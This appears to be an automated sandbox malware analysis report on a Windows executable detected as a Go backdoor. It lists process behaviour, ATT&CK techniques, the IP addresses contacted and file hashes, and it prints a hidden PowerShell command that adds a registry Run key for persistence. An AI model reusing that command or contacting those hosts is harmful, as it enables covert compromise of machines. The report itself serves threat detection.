        Source: C:\Users\user\Desktop\antispam_connect1.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "if (-not (test-path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\\app\")) { set-itemproperty -path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\" -name \"app\" -value \"c:\users\user\desktop\antispam_connect1.exe\" }"Jump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeQueries volume information: C:\Users\user\AppData\Local\config VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeQueries volume information: C:\Users\user\AppData\Local\config VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\user\Desktop\antispam_connect1.exeQueries volume information: C:\Users\user\AppData\Local\config VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\user\Desktop\antispam_connect1.exeCode function: 0_2_00D563A9 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00D563A9

        Stealing of Sensitive Information

        barindex
        Yara detected GO Backdoor
        Source: Yara matchFile source: Process Memory Space: antispam_connect1.exe PID: 5024, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: antispam_connect1.exe PID: 1600, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: antispam_connect1.exe PID: 1900, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Yara detected GO Backdoor
        Source: Yara matchFile source: Process Memory Space: antispam_connect1.exe PID: 5024, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: antispam_connect1.exe PID: 1600, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: antispam_connect1.exe PID: 1900, type: MEMORYSTR

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Command and Scripting Interpreter        		1
        Registry Run Keys / Startup Folder        		11
        Process Injection        		1
        Masquerading        		OS Credential Dumping1
        System Time Discovery        		Remote Services1
        Archive Collected Data        		1
        Encrypted Channel        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts1
        PowerShell        		1
        DLL Side-Loading        		1
        Registry Run Keys / Startup Folder        		21
        Virtualization/Sandbox Evasion        		LSASS Memory1
        Security Software Discovery        		Remote Desktop ProtocolData from Removable Media1
        Non-Standard Port        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        DLL Side-Loading        		11
        Process Injection        		Security Account Manager1
        Process Discovery        		SMB/Windows Admin SharesData from Network Shared Drive1
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        Obfuscated Files or Information        		NTDS21
        Virtualization/Sandbox Evasion        		Distributed Component Object ModelInput Capture1
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Software Packing        		LSA Secrets1
        Application Window Discovery        		SSHKeylogging1
        Proxy        		Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        DLL Side-Loading        		Cached Domain Credentials12
        System Information Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        antispam_connect1.exe100%Joe Sandbox ML

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://nuget.org/NuGet.exe0%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
        https://contoso.com/License0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        https://contoso.com/0%URL Reputationsafe
        https://nuget.org/nuget.exe0%URL Reputationsafe
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

        Domains and IPs

        Contacted Domains

        No contacted domains info

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://93.185.159.253/false
          		unknown
          http://188.130.206.243/false
            		unknown
            http://46.8.232.106/false
              		unknown
              http://46.8.236.61/false
                		unknown
                http://91.212.166.91/false
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2182621146.0000000005E97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2350825775.0000000006577000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2433230502.000000000571E000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://go.micpowershell.exe, 00000009.00000002.2415769151.0000000000816000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000009.00000002.2417908077.0000000004801000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000009.00000002.2417908077.0000000004801000.00000004.00000800.00020000.00000000.sdmpfalse
                      		unknown
                      http://188.130.206.243antispam_connect1.exe, 00000008.00000002.3375163956.000000000C89C000.00000004.00001000.00020000.00000000.sdmpfalse
                        		unknown
                        https://aka.ms/pscore6lBeqpowershell.exe, 00000002.00000002.2179126154.0000000004E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2342214016.0000000005511000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2417908077.00000000046B1000.00000004.00000800.00020000.00000000.sdmpfalse
                          		unknown
                          http://www.microsoft.copowershell.exe, 00000002.00000002.2178335062.0000000000CF4000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            https://contoso.com/Licensepowershell.exe, 00000009.00000002.2433230502.000000000571E000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://contoso.com/Iconpowershell.exe, 00000009.00000002.2433230502.000000000571E000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://93.185.159.253antispam_connect1.exe, 00000008.00000002.3375163956.000000000C89C000.00000004.00001000.00020000.00000000.sdmpfalse
                              		unknown
                              http://46.8.236.61antispam_connect1.exe, 00000008.00000002.3375163956.000000000C89C000.00000004.00001000.00020000.00000000.sdmpfalse
                                		unknown
                                https://github.com/Pester/Pesterpowershell.exe, 00000009.00000002.2417908077.0000000004801000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://91.212.166.91antispam_connect1.exe, 00000008.00000002.3375163956.000000000C89C000.00000004.00001000.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://46.8.232.106antispam_connect1.exe, 00000008.00000002.3375163956.000000000C89C000.00000004.00001000.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://188.130.206.243http://46.8.232.106antispam_connect1.exe, 00000008.00000002.3375163956.000000000C89C000.00000004.00001000.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://contoso.com/powershell.exe, 00000009.00000002.2433230502.000000000571E000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2182621146.0000000005E97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2350825775.0000000006577000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2433230502.000000000571E000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://91.212.166.91http://46.8.232.106antispam_connect1.exe, 00000000.00000002.3374772415.000000000D042000.00000004.00001000.00020000.00000000.sdmp, antispam_connect1.exe, 00000000.00000002.3374772415.000000000D044000.00000004.00001000.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2179126154.0000000004E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2342214016.0000000005511000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2417908077.00000000046B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://91.212.166.91C:antispam_connect1.exe, 00000000.00000002.3374772415.000000000D044000.00000004.00001000.00020000.00000000.sdmpfalse
                                            		unknown

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            46.8.232.106
                                            		unknownRussian Federation
                                            		28917FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsfalse
                                            188.130.206.243
                                            		unknownRussian Federation
                                            		200509SVINT-ASNESfalse
                                            93.185.159.253
                                            		unknownRussian Federation
                                            		39912I3B-ASATfalse
                                            91.212.166.91
                                            		unknownUnited Kingdom
                                            		35819MOBILY-ASEtihadEtisalatCompanyMobilySAfalse
                                            109.172.88.38
                                            		unknownRussian Federation
                                            		41691SUMTEL-AS-RIPEMoscowRussiaRUtrue
                                            46.8.236.61
                                            		unknownRussian Federation
                                            		28917FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsfalse

                                            General Information

                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1533403
                                            Start date and time:2024-10-14 17:21:12 +02:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 8m 7s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:13
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:antispam_connect1.exe
                                            Detection:MAL
                                            Classification:mal84.troj.evad.winEXE@12/8@0/6
                                            EGA Information:
                                            • Successful, ratio: 75%
                                            HCA Information:
                                            • Successful, ratio: 67%
                                            • Number of executed functions: 9
                                            • Number of non-executed functions: 1
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe

                                            Warnings

                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Execution Graph export aborted for target powershell.exe, PID 5420 because it is empty
                                            • Not all processes where analyzed, report is missing behavior information
                                            • VT rate limit hit for: antispam_connect1.exe

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            11:22:18API Interceptor9x Sleep call for process: powershell.exe modified
                                            17:22:19AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run App C:\Users\user\Desktop\antispam_connect1.exe
                                            17:22:28AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run App C:\Users\user\Desktop\antispam_connect1.exe

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            46.8.232.106wa_3rd_party_host_32.exeGet hashmaliciousGO BackdoorBrowse
                                            • 46.8.232.106/
                                            wa_3rd_party_host_32.exeGet hashmaliciousGO BackdoorBrowse
                                            • 46.8.232.106/
                                            5ndBtx7pRX.exeGet hashmaliciousGO BackdoorBrowse
                                            • 46.8.232.106/
                                            5ndBtx7pRX.exeGet hashmaliciousGO BackdoorBrowse
                                            • 46.8.232.106/
                                            GoogleInstaller.exeGet hashmaliciousGO BackdoorBrowse
                                            • 46.8.232.106/
                                            GoogleInstaller.exeGet hashmaliciousGO BackdoorBrowse
                                            • 46.8.232.106/
                                            93.185.159.253wa_3rd_party_host_32.exeGet hashmaliciousGO BackdoorBrowse
                                            • 93.185.159.253/
                                            wa_3rd_party_host_32.exeGet hashmaliciousGO BackdoorBrowse
                                            • 93.185.159.253/
                                            5ndBtx7pRX.exeGet hashmaliciousGO BackdoorBrowse
                                            • 93.185.159.253/
                                            5ndBtx7pRX.exeGet hashmaliciousGO BackdoorBrowse
                                            • 93.185.159.253/
                                            GoogleInstaller.exeGet hashmaliciousGO BackdoorBrowse
                                            • 93.185.159.253/

                                            Domains

                                            No context

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            SVINT-ASNESna.elfGet hashmaliciousMirai, MoobotBrowse
                                            • 188.130.200.140
                                            FIORD-ASIP-transitoperatorinRussiaUkraineandBalticswa_3rd_party_host_32.exeGet hashmaliciousGO BackdoorBrowse
                                            • 46.8.236.61
                                            wa_3rd_party_host_32.exeGet hashmaliciousGO BackdoorBrowse
                                            • 46.8.236.61
                                            2efOvyn28p.exeGet hashmaliciousStealc, VidarBrowse
                                            • 46.8.231.109
                                            20fUAMt5dL.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                            • 46.8.231.109
                                            SKGOzZRZGX.exeGet hashmaliciousStealcBrowse
                                            • 46.8.231.109
                                            SecuriteInfo.com.Trojan.DownLoader47.43340.12576.1316.exeGet hashmaliciousStealcBrowse
                                            • 46.8.231.109
                                            lihZ6gUU7V.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                            • 46.8.231.109
                                            FdjDPFGTZS.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                            • 46.8.231.109
                                            45Ywq5ad5H.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                            • 46.8.231.109
                                            NdSXVNeoET.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                            • 46.8.231.109
                                            MOBILY-ASEtihadEtisalatCompanyMobilySAna.elfGet hashmaliciousMirai, MoobotBrowse
                                            • 176.18.57.22
                                            na.elfGet hashmaliciousMirai, MoobotBrowse
                                            • 37.16.45.237
                                            na.elfGet hashmaliciousMirai, MoobotBrowse
                                            • 176.225.179.248
                                            na.elfGet hashmaliciousMirai, OkiruBrowse
                                            • 62.120.34.75
                                            na.elfGet hashmaliciousMiraiBrowse
                                            • 31.167.93.113
                                            ULRmk7oYR7.elfGet hashmaliciousMiraiBrowse
                                            • 46.230.84.61
                                            na.elfGet hashmaliciousMiraiBrowse
                                            • 176.224.224.197
                                            na.elfGet hashmaliciousMiraiBrowse
                                            • 5.110.196.218
                                            na.elfGet hashmaliciousMiraiBrowse
                                            • 5.108.208.209
                                            na.elfGet hashmaliciousMiraiBrowse
                                            • 5.108.29.123
                                            I3B-ASATwa_3rd_party_host_32.exeGet hashmaliciousGO BackdoorBrowse
                                            • 93.185.159.253
                                            wa_3rd_party_host_32.exeGet hashmaliciousGO BackdoorBrowse
                                            • 93.185.159.253
                                            3wtD2jXnxy.exeGet hashmaliciousRedLine, STRRATBrowse
                                            • 93.185.156.125
                                            5ndBtx7pRX.exeGet hashmaliciousGO BackdoorBrowse
                                            • 93.185.159.253
                                            5ndBtx7pRX.exeGet hashmaliciousGO BackdoorBrowse
                                            • 93.185.159.253
                                            GoogleInstaller.exeGet hashmaliciousGO BackdoorBrowse
                                            • 93.185.159.253
                                            3DF6fqp3ME.elfGet hashmaliciousMiraiBrowse
                                            • 78.142.79.102
                                            q5C2tw1Pc6.elfGet hashmaliciousMiraiBrowse
                                            • 37.186.3.143
                                            IZ4Om6WI3Q.elfGet hashmaliciousUnknownBrowse
                                            • 78.142.97.183
                                            b3astmode.x86.elfGet hashmaliciousMiraiBrowse
                                            • 78.142.79.149

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1264
                                            Entropy (8bit):5.383800533480639
                                            Encrypted:false
                                            SSDEEP:24:3FK9WSKco4KmM6GjKbm51s4RPQoUebIl+mZ9tXt/NK3R8O9rD:OWSU4YymI4RIoUeU+mZ9tlNWR8GX
                                            MD5:066042D7A767BAA8CC691874F740A9AD
                                            SHA1:F9372459480770D5D308AC0D512EA03CC37489F5
                                            SHA-256:16CAEEAE49D83237C43A5C69387CE955735A10A91580CA99C8FA17788A7AB654
                                            SHA-512:887AAF1481ECB8BF1C823FDFB77F14D084AD06CC22747B14477F9A533C2E73C0DE123B261D0FA03E81843B150E434DF767E9F7EE7172F3E30B39C20E2CE6005B
                                            Malicious:false
                                            Reputation:low
                                            Preview:@...e.................................:..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2zqirwgs.dat.psm1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4dftown3.efv.ps1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5hhxmqpo.0qh.ps1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cppyhvly.hs3.ps1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
